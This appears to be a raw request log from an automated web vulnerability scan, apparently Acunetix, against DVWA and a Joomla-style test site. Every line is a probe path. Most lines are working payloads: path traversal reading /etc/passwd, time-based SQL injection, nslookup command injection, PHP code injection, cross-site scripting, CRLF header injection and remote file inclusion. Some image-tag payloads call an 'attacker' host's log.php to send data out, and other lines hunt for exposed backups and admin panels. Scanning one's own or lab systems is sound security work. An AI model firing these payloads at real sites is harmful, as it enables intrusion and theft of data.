/!(()%26%26!%7c*%7c*%7c/content/category
/$sitepreview/localhost:2006/Wizard/
/%24(nslookup%20wM4jKgxD)/content/article/1-testsayfasi
/%24{%40print(md5(acunetix_wvs_security_test))}%5c/1-testsayfasi
/%24{%40print(md5(acunetix_wvs_security_test))}/search/
/%2569%256E%2564%2565%2578%252E%2570%2568%2570%253C%2553%2563%2552%2569%2550%2574%2520%253E%254A%2549%2566%257A%25289995%2529%253C%252F%2573%2543%2572%2569%2570%2554%253E/users/
/%2569%256E%2564%2565%2578%252E%2570%2568%2570%253C%2553%2563%2552%2569%2550%2574%2520%253E%254B%256D%2550%2547%25289291%2529%253C%252F%2573%2543%2572%2569%2570%2554%253E/content/category
/%26nslookup%20OENbNEQG%26'%5c\
/';print(md5(acunetix_wvs_security_test));%24a='/search/
/';print(md5(acunetix_wvs_security_test));%24a='/users/
/'\
/-1'%20OR%202%2b639-639-1=0%2b0%2b0%2b1%20--%20/1-testsayfasi
/-1\
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.php/search/
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd/content/article/1-testsayfasi
/../../../../../../../../../../etc/passwd%00.php/1-testsayfasi
/../../../../../../../../../../etc/passwd/1-testsayfasi
/../../../../../../../../../../../../../../../../etc/passwd/search/
/.stats/
/../../../../../../../../../../etc/passwd%00.php/users/
/.././.././.././.././.././.././.././../etc/./passwd%2500/1-testsayfasi
/vulnweb.com/%2e%2e
/www.vulnweb.com/search/
/www.vulnweb.com/users/
/WEB-INF/jboss-web.xml
/WEB-INF/web.xml%20(copy)
/WEB-INF/web.xml~
/users/
/en/account/register
/etc/passwd/users/
/register
/registration.asp
/registration.html
/1%00%c0%a7%c0%a2%252527%252522/1-testsayfasi
/12345'\
/192-backup.rar
/192-database.rar
/192-database.tar.gz
/192-dump.7z
/192.7z
/192.sql.tar
/192_backup.tar
/192_db.sql
/192_db.tar.gz
/192backup.tar
/9099221
/<a%20HrEF=http:/www.vulnweb.com></a>/search/

/
/dvwa
/dvwa/includes/DBMS/DBMS.php
/instructions.php?doc=%24(nslookup%20aIU6kuW4)
/instructions.php?doc=../../../../../../../../../../../../../../../proc/version
/instructions.php?doc=/../../../../../../../../../../etc/passwd%00.jpg
/instructions.php?doc=/.././.././.././.././.././.././.././../etc/./passwd%2500
/instructions.php?doc=;print(md5(acunetix_wvs_security_test));
/instructions.php?doc=JyI=
/instructions.php?doc=instructions.php/.
/instructions.php?doc=invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
/login.php
/logout.php
/security.php?phpids='\
/security.php?phpids=(select(0)from(select(sleep(2)))v)/*'%2b(select(0)from(select(sleep(2)))v)%2b'\
/security.php?phpids=)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
/security.php?phpids=-1'%20OR%202%2b794-794-1=0%2b0%2b0%2b1%20--%20
/security.php?phpids=-1\
/security.php?phpids=.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./etc/passwd
/security.php?phpids=../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
/security.php?phpids=../../../../../../../../../../etc/passwd%00.jpg
/security.php?phpids=583'
/security.php?phpids=JyI=
/security.php?phpids=WEB-INF%5cweb.xml
/security.php?phpids=\
/security.php?phpids=on9660639
/security.php?test=%24(nslookup%20XLlAYwBG)
/security.php?test=%24{%40print(md5(acunetix_wvs_security_test))}%5c
/security.php?test=-1\
/security.php?test=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.name)%253C/script%253E
/security.php?test=../../../../../../../../../../../../../../../proc/version
/security.php?test=/.././.././.././.././.././.././.././../etc/./passwd%2500
/security.php?test=/www.vulnweb.com
/security.php?test=1%20waitfor%20delay%20'0:0:2'%20--%20
/security.php?test=B6AYsLud
/security.php?test=MbSc4Pmg');select%20pg_sleep(4);%20--%20
/security.php?test=http:/hityOFNMx4mK9.bxss.me/
/security.php?test=http:/some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.name)%3C/script%3E
/security.php?test=set%7cset%26set
/security.php?test[]=\
/vulnerabilities/brute/
/vulnerabilities/fi/?page=/etc/passwd
/vulnerabilities/fi?page=!(()%26%26!%7c*%7c*%7c
/vulnerabilities/fi?page=%0d%09SomeCustomInjectedHeader:%20injected_by_wvs
/vulnerabilities/fi?page=%E5%98%8A%E5%98%8DSomeCustomInjectedHeader:%20injected_by_wvs
/vulnerabilities/fi?page=%c4%8d%c4%8aSomeCustomInjectedHeader:%20injected_by_wvs
/vulnerabilities/fi?page='\
/vulnerabilities/fi?page=(select(0)from(select(sleep(2)))v)/*'%2b(select(0)from(select(sleep(2)))v)%2b'\
/vulnerabilities/fi?page=-1'%20OR%202%2b186-186-1=0%2b0%2b0%2b1%20or%20'Itiab4Gk'='
/vulnerabilities/fi?page=../../../../../../../../../../../../../../../proc/version
/vulnerabilities/fi?page=/.././.././.././.././.././.././.././../etc/./passwd%2500
/vulnerabilities/fi?page=\
/vulnerabilities/view_source_all.php
/vulnerabilities/xss_s/
/WEB-INF%5cweb.xml/content/article/1-testsayfasi
/acu8985%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca8985/content/category
/admin.cgi
/admin/mysql/main.php
/admin/phpmyadmin/
/admin/pma/main.php
/administrator/templates/bluestork/images/admin/
/administrator/templates/bluestork/images/j_login_lock.png
/backup-192.7z
/backup-192.sql
/backup.sql
/backup.tar.gz
/backup.zip
/backup192.tar.gz
/backup_192.sql
/bq3abQAf';%20waitfor%20delay%20'0:0:2'%20--%20/1-testsayfasi
/cgi-bin/awstats/
/cgi-sys/domainredirect.cgi
/cgi-sys/entropybanner.cgi
/chIu1oui/1-testsayfasi
/cli
/computing/robots
/computing/robots/check.html
/core
/dump.sql.tar
/examples/jsp/snp/snoop.jsp
/examples/servlets/index.html
/file://etc/passwd/content/article/1-testsayfasi
/gqdZichO83.cfm
/gqdZichO83.jsp
/http:/hitihyK8VoHpT.bxss.me/content/category
/http:/hitvtXI9axeIm.bxss.me/search/
/http:/testasp.vulnweb.com/t/fit.txt%3F.php/1-testsayfasi
/http:/testasp.vulnweb.com/t/fit.txt%3F.php/search/
/http:/testasp.vulnweb.com/t/xss.html%3f%2500.jpg/1-testsayfasi
/http:/www.vulnweb.com/users/
/if(now()=sysdate()%2csleep(6)%2c0)/*'XOR(if(now()=sysdate()%2csleep(6)%2c0))OR'\
/images/joomla_black.gif
/index.html
/index.php%25'%20AND%202*3*8=6*8%20AND%20'TIjI'!='TIjI%25/content/category
/index.php%26lt;ScRiPt%26gt;nzRa(9828)%26lt;/sCripT%26gt;/1-testsayfasi
/index.php%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%4A%49%66%7A%28%39%38%38%36%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E/search/
/%24{%40print(md5(acunetix_wvs_security_test))}%5c/search/
/%24{%40print(md5(acunetix_wvs_security_test))}/content/article/1-testsayfasi
/%24{9999410%2b9999115}/users/
/%252fetc%252fpasswd/content/article/1-testsayfasi
/%252fetc%252fpasswd/users/
/%40%405LBhn/search/
/%5e(%23%24!%40%23%24)(()))******/content/article/1-testsayfasi
/%bf'%bf\
/%f0''%f0\
/)/content/category
/-1%20OR%202%2b394-394-1=0%2b0%2b0%2b1%20--%20/users/
/-1%20OR%202%2b658-658-1=0%2b0%2b0%2b1/content/article/1-testsayfasi
/-1%20OR%203%2b805-805-1=0%2b0%2b0%2b1/users/
/-1%20OR%203*2>(0%2b5%2b658-658)/content/article/1-testsayfasi
/-1'%20OR%203%2b528-528-1=0%2b0%2b0%2b1%20or%20'S912wkFN'='-uncategorised/1-testsayfasi
/-1'%20OR%203*2<(0%2b5%2b324-324)%20--%20-uncategorised/1-testsayfasi
/-1);select%20pg_sleep(6);%20--%20-uncategorised/1-testsayfasi
/../../../../../../../../../../../../../../../proc/version-uncategorised/1-testsayfasi
/../../../../../../../../../../etc/passwd%00.jpg/search/
/../../../../../../../../../../../../../../../../etc/passwd/search/
/../../../../../../../../../../etc/passwd%00.jpg/users/
/www.vulnweb.com/search/
/1%20waitfor%20delay%20'0:0:4'%20--%20-uncategorised/1-testsayfasi
/1'\
/1some_inexistent_file_with_long_name%00.jpg/users/
/2-%2575%256E%2563%2561%2574%2565%2567%256F%2572%2569%2573%2565%2564%2522%256F%256E%256D%256F%2575%2573%2565%256F%2576%2565%2572%253D%256E%257A%2552%2561%2528%2539%2536%2536%2539%2529%2522/1-testsayfasi
/2-%26nslookup%20A90TQOGX%26'%5c\
/2-)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))/1-testsayfasi
/2-..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg/1-testsayfasi
/2-/%5c../%5c../%5c../%5c../%5c../%5c../%5c../etc/passwd/1-testsayfasi
/2-1'\
/2-<!--/1-testsayfasi
/2-file://etc/passwd/1-testsayfasi
/2-http:/testasp.vulnweb.com/t/xss.html%3f%2500.jpg/1-testsayfasi
/%24{%40print(md5(acunetix_wvs_security_test))}-testsayfasi
/%26nslookup%20uTPwZSUU%26'%5c\
/-1%20OR%202%2b138-138-1=0%2b0%2b0%2b1-testsayfasi
/-1%20OR%203*2>(0%2b5%2b138-138)-testsayfasi
/-1);select%20pg_sleep(2);%20--%20-testsayfasi
/-1;%20waitfor%20delay%20'0:0:2'%20--%20-testsayfasi
/-1;select%20pg_sleep(2);%20--%20-testsayfasi
/.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./etc/passwd-testsayfasi
/../../../../../../../../../../etc/passwd-testsayfasi
/../../../../../../../../../../../../../../../../etc/passwd-testsayfasi
/1-%252fetc%252fpasswd
/1--1'%20OR%202%2b196-196-1=0%2b0%2b0%2b1%20or%20'01Fg5alL'='
/1-../../../../../../../../../../../../../../../proc/version
/1-/../../../../../../../../../../etc/passwd%00.jpg
/1-1%20waitfor%20delay%20'0:0:6'%20--%20
/1-1'\
/1-745'
/1-993361
/1-JyI=
/1-http:/testasp.vulnweb.com/t/fit.txt%3F.jpg
/1-testsayfasi
/1-testsayfasi'\
/1-testsayfasi?page=%24{%40print(md5(acunetix_wvs_security_test))}%5c&print=1&tmpl=component
/1-testsayfasi?page=%40%40HGekg&print=1&tmpl=component
/1-testsayfasi?page=&print=!(()%26%26!%7c*%7c*%7c&tmpl=component
/1-testsayfasi?page=&print=%252fetc%252fpasswd&tmpl=component
/1-testsayfasi?page=&print=%bf'%bf\
/1-testsayfasi?page=&print=-1'%20OR%203*2<(0%2b5%2b564-564)%20--%20&tmpl=component
/1-testsayfasi?page=&print=-1;%20waitfor%20delay%20'0:0:6'%20--%20&tmpl=component
/1-testsayfasi?page=&print=../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd&tmpl=component
/1-testsayfasi?page=&print=1&tmpl=!(()%26%26!%7c*%7c*%7c
/1-testsayfasi?page=&print=1&tmpl=%26nslookup%20r9BlV38O%26'%5c\
/1-testsayfasi?page=&print=1&tmpl='\
/1-testsayfasi?page=&print=1&tmpl=-1'%20OR%203%2b547-547-1=0%2b0%2b0%2b1%20--%20
/1-testsayfasi?page=&print=1&tmpl=JyI=
/1-testsayfasi?page=&print=1&tmpl=WSLQCRuZ
/1-testsayfasi?page=&print=1&tmpl=component
/1-testsayfasi?page=&print=1&tmpl=http:/testasp.vulnweb.com/t/fit.txt%3F.jpg
/1-testsayfasi?page=&print=19315294&tmpl=component
/1-testsayfasi?page=&print=http:/some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg&tmpl=component
/1-testsayfasi?page=&print=testasp.vulnweb.com&tmpl=component
/1-testsayfasi?page=-1%20OR%202%2b595-595-1=0%2b0%2b0%2b1%20--%20&print=1&tmpl=component
/1-testsayfasi?page=-1%20OR%203*2<(0%2b5%2b595-595)%20--%20&print=1&tmpl=component
/1-testsayfasi?page=-1;%20waitfor%20delay%20'0:0:4'%20--%20&print=1&tmpl=component
/1-testsayfasi?page=-1;select%20pg_sleep(6);%20--%20&print=1&tmpl=component
/1-testsayfasi?page=../../../../../../../../../../../../../../../proc/version&print=1&tmpl=component
/1-testsayfasi?page=../../../../../../../../../../etc/passwd%00.jpg&print=1&tmpl=component
/1-testsayfasi?page=1'\
/1-testsayfasi?page=1-testsayfasi%00&print=1&tmpl=component
/1-testsayfasi?page=1-testsayfasi&print=1&tmpl=component
/1-testsayfasi?page=http:/hitOsC8e8JdXR.bxss.me/&print=1&tmpl=component
/1-testsayfasi?page=set%7cset%26set&print=1&tmpl=component
/524'-testsayfasi
/http:/testasp.vulnweb.com/t/xss.html%3f%2500.jpg-testsayfasi
/2-{{9999546*9999712}}/1-testsayfasi
/288'-uncategorised/1-testsayfasi
/;print(md5(acunetix_wvs_security_test));/content/article/1-testsayfasi
/;print(md5(acunetix_wvs_security_test));/users/
/<!--/content/category
/HdAWwOaY/content/category
/HvWHLLCJ/search/
/JyI=/users/
/KKowVt0U';select%20pg_sleep(6);%20--%20-uncategorised/1-testsayfasi
/URLbTeUh';select%20pg_sleep(2);%20--%20/search/
/WEB-INF/web.xml/search/
/XGcirywa';%20waitfor%20delay%20'0:0:4'%20--%20-uncategorised/1-testsayfasi
/\
/ba2hzVq4';%20waitfor%20delay%20'0:0:6'%20--%20/search/
/component%25'%20AND%202*3*8=6*8%20AND%20'Q3Hr'!='Q3Hr%25/users/
/!(()%26%26!%7c*%7c*%7c/article/1-testsayfasi
/%24{%40print(md5(acunetix_wvs_security_test))}/article/1-testsayfasi
/%252fetc%252fpasswd/category
/%26nslookup%20TLfQa2lY%26'%5c\
/%f0''%f0\
/'%2bresponse.write(9643611*9133510)%2b'/article/1-testsayfasi
/(select(0)from(select(sleep(6)))v)/*'%2b(select(0)from(select(sleep(6)))v)%2b'\
/-1%20OR%203%2b554-554-1=0%2b0%2b0%2b1%20--%20/article/1-testsayfasi
/../../../../../../../../../../etc/passwd/
/12345'\
/1some_inexistent_file_with_long_name%00.jpg/category
/647'/
/;print(md5(acunetix_wvs_security_test));/category
/JyI=/
/\
/content/%0aSomeCustomInjectedHeader:%20injected_by_wvs/1-testsayfasi
/content/%0d%09SomeCustomInjectedHeader:%20injected_by_wvs
/content/%252fetc%252fpasswd
/content/%40%40on5TR
/content/%f6<img%20acu%20onmouseover=KmPG(9052)%20/%f6>
/content/'%2bresponse.write(9676140*9552316)%2b'
/content/';print(md5(acunetix_wvs_security_test));%24a='/1-testsayfasi
/content/-1%20OR%203*2<(0%2b5%2b172-172)/1-testsayfasi
/content/-1%20OR%203*2>(0%2b5%2b172-172)/1-testsayfasi
/content/-1%20OR%203*2>(0%2b5%2b708-708)%20--%20/1-testsayfasi
/content/-1'%20OR%203*2>(0%2b5%2b243-243)%20--%20/1-testsayfasi
/content/-1\
/content/../../../../../../../../../../etc/passwd%00.jpg/1-testsayfasi
/content/../../../../../../../../../../etc/passwd%00.jpg/1-testsayfasi
/content/1%20waitfor%20delay%20'0:0:2'%20--%20
/content/178-0-0-/1-testsayfasi
/content/248''/1-testsayfasi
/content/?format=%24{%40print(md5(acunetix_wvs_security_test))}%5c&type=atom&view=featured
/content/?format=%252fetc%252fpasswd&type=rss&view=featured
/content/?format=%f0''%f0\
/content/?format=&type=atom&view=featured
/content/?format=';print(md5(acunetix_wvs_security_test));%24a='&type=atom&view=featured
/content/?format='\
/content/?format=(select(0)from(select(sleep(2)))v)/*'%2b(select(0)from(select(sleep(2)))v)%2b'\
/content/?format=)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))&type=atom&view=featured
/content/?format=.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./etc/passwd&type=rss&view=featured
/content/?format=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg&type=atom&view=featured
/content/?format=1'\
/content/?format=617-0-0-0-0&type=rss&view=featured
/content/?format=718''&type=atom&view=featured
/content/?format=\
/content/?format=feed&type=%24{%40print(md5(acunetix_wvs_security_test))}&view=featured
/content/?format=feed&type=%f0''%f0\
/content/?format=feed&type=&view=featured
/content/?format=feed&type=/%5c../%5c../%5c../%5c../%5c../%5c../%5c../etc/passwd&view=featured
/content/?format=feed&type=/../../../../../../../../../../etc/passwd%00.jpg&view=featured
/content/?format=feed&type=/WEB-INF/web.xml&view=featured
/content/?format=feed&type=1some_inexistent_file_with_long_name%00.jpg&view=featured
/content/?format=feed&type=643''&view=featured
/content/?format=feed&type=<!--&view=featured
/content/?format=feed&type=Http:/testasp.vulnweb.com/t/fit.txt&view=featured
/content/?format=feed&type=\
/content/?format=feed&type=atom&view=
/content/?format=feed&type=atom&view=%24{9999303%2b10000064}
/content/?format=feed&type=atom&view=%2566%2565%2561%2574%2575%2572%2565%2564%253C%2553%2563%2552%2569%2550%2574%2520%253E%2570%2533%256F%255A%25289144%2529%253C%252F%2573%2543%2572%2569%2570%2554%253E
/content/?format=feed&type=atom&view=%c4%8d%c4%8aSomeCustomInjectedHeader:%20injected_by_wvs
/content/?format=feed&type=atom&view=%f0''%f0\
/content/?format=feed&type=atom&view=-1%20OR%203*2<(0%2b5%2b966-966)%20--%20
/content/?format=feed&type=atom&view=-1%20OR%203*2>(0%2b5%2b387-387)
/content/?format=feed&type=atom&view=../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
/content/?format=feed&type=atom&view=/WEB-INF/web.xml
/content/?format=feed&type=atom&view=1'\
/content/?format=feed&type=atom&view=<!--
/content/?format=feed&type=atom&view=JyI=
/content/?format=feed&type=atom&view=VRvUBjlU');select%20pg_sleep(6);%20--%20
/content/?format=feed&type=atom&view=[url=http:/www.vulnweb.com][/url]
/content/?format=feed&type=atom&view=featured%26n954526=v987369
/content/?format=feed&type=atom&view=featured<body%20onload=p3oZ(9741)>
/content/?format=feed&type=atom&view=featured<img%20sRc='http:/attacker-9230/log.php%3f
/content/?format=feed&type=atom&view=testasp.vulnweb.com
/content/?format=feed&type=http:/hit0tE047xHp4.bxss.me/&view=featured
/content/?format=feed&type=rss&view=!(()%26%26!%7c*%7c*%7c
/content/?format=feed&type=rss&view=%24{%40print(md5(acunetix_wvs_security_test))}
/content/?format=feed&type=rss&view=%5c
/content/?format=feed&type=rss&view=%E5%98%8A%E5%98%8DSomeCustomInjectedHeader:%20injected_by_wvs
/content/?format=feed&type=rss&view=)
/content/?format=feed&type=rss&view=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg
/content/?format=feed&type=rss&view=/../../../../../../../../../../etc/passwd%00.jpg
/content/?format=feed&type=rss&view=1%20waitfor%20delay%20'0:0:9'%20--%20
/content/?format=feed&type=rss&view=b2JXMTkya1I=
/content/?format=feed&type=rss&view=featured'%20AND%202*3*8=6*8%20AND%20'vmBi'='vmBi
/content/?format=feed&type=rss&view=featured<BLxiS7<
/content/?format=feed&type=rss&view=featured<body%20onload=p3oZ(9307)>
/content/?format=feed&type=rss&view=featured<input%20autofocus%20onfocus=p3oZ(9518)>
/content/?format=feed&type=rss&view=http:/some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg
/content/?format=feed&type=rss&view=index.php%00
/content/?format=feed&type=rss&view[$acunetix]=1
/content/?format=feed'\
/content/?format=fqV9EhY9';%20waitfor%20delay%20'0:0:3'%20--%20&type=rss&view=featured
/content/?format=http:/some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg&type=atom&view=featured
/content/?format=http:/testasp.vulnweb.com/t/fit.txt%3F.jpg&type=rss&view=featured
/content/?format=http:/testasp.vulnweb.com/t/xss.html%3f%2500.jpg&type=atom&view=featured
/content/?format=mxdOplJQ&type=rss&view=featured
/content/?format=response.write(9054738*9818636)&type=rss&view=featured
/content/?view=featured
/content/JyI=
/content/WEB-INF/web.xml/1-testsayfasi
/content/acux3487%C0%BEz1%C0%BCz2a%90bcxuca3487
/content/article/%24{%40print(md5(acunetix_wvs_security_test))}%5c-uncategorised/1-testsayfasi
/content/article/%252fetc%252fpasswd-uncategorised/1-testsayfasi
/content/article/-1%20OR%203*2<(0%2b5%2b763-763)%20--%20-uncategorised/1-testsayfasi
/content/article/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd-uncategorised/1-testsayfasi
/content/article/../../../../../../../../../../etc/passwd-uncategorised/1-testsayfasi
/content/article/../../../../../../../../../../etc/passwd%00.jpg-uncategorised/1-testsayfasi
/content/article/etc/passwd-uncategorised/1-testsayfasi
/content/article/2-';print(md5(acunetix_wvs_security_test));%24a='/1-testsayfasi
/content/article/2-../../../../../../../../../../../../../../../proc/version/1-testsayfasi
/content/article/2-1some_inexistent_file_with_long_name%00.jpg/1-testsayfasi
/content/article/2-http:/hit4xl8K9hMuz.bxss.me/1-testsayfasi
/content/article/2-http:/testasp.vulnweb.com/t/fit.txt%3F.jpg/1-testsayfasi
/content/article/%26nslookup%20eq7F1CPF%26'%5c\
/content/article/%5e(%23%24!%40%23%24)(()))******-testsayfasi
/content/article/1-testsayfasi
/content/article/Http:/testasp.vulnweb.com/t/fit.txt-testsayfasi
/content/article/WEB-INF%5cweb.xml-uncategorised/1-testsayfasi
/content/article/file://etc/passwd-uncategorised/1-testsayfasi
/content/article/http:/testasp.vulnweb.com/t/fit.txt%3F.jpg-uncategorised/1-testsayfasi
/content/cI3VbvVZ';%20waitfor%20delay%20'0:0:2'%20--%20
/content/category/%24{%40print(md5(acunetix_wvs_security_test))}%5c-uncategorised
/content/category/%26nslookup%209ZcO2HwE%26'%5c\
/content/category/';print(md5(acunetix_wvs_security_test));%24a='-uncategorised
/content/category/-1));select%20pg_sleep(6);%20--%20-uncategorised
/content/category/WEB-INF/web.xml-uncategorised
/content/category/1*1*1*2-uncategorised
/content/category/2-%24(nslookup%20LUJaj2Lg)
/content/category/2-%40%40DEYej
/content/category/2-%f0''%f0\
/content/category/2-'\
/content/category/2-(select(0)from(select(sleep(4.156000000000001)))v)/*'%2b(select(0)from(select(sleep(4.156000000000001)))v)%2b'\
/content/category/2-)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
/content/category/2--1%20OR%203%2b23-23-1=0%2b0%2b0%2b1%20--%20
/content/category/2--1%20OR%203*2<(0%2b5%2b582-582)
/content/category/2--1'%20OR%203%2b560-560-1=0%2b0%2b0%2b1%20--%20
/content/category/2--1'%20OR%203*2<(0%2b5%2b209-209)%20or%20'eRaEhFRv'='
/content/category/2--1\
/content/category/2-1'\
/content/category/2-LMrcfgNP
/content/category/2-set%7cset%26set
/content/category
/content/category\
/content/category/;print(md5(acunetix_wvs_security_test));-uncategorised
/content/category/if(now()=sysdate()%2csleep(6)%2c0)/*'XOR(if(now()=sysdate()%2csleep(6)%2c0))OR'\
/content/category/lp1mMT6M');select%20pg_sleep(6);%20--%20-uncategorised
/content/category9505255
/content/category<%25%20contenteditable%20onresize=KmPG(9087)>
/content/category<ScRiPt%20%0d%0a>KmPG(9976)</ScRiPt>
/content/category<WL9EET>KMQUC[!%2b!]</WL9EET>
/content/category<img%20sRc='http:/attacker-9478/log.php%3f
/content/category\
/content/category}body{acu:Expre/**/SSion(KmPG(9033))}
/content/file://etc/passwd/1-testsayfasi
/content/iWntsKS5';select%20pg_sleep(2);%20--%20
/file://etc/passwd/category
/ftu6dBTL/category
/http:/some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/article/1-testsayfasi
/http:/testasp.vulnweb.com/t/xss.html%3f%2500.jpg/
/invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
/invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.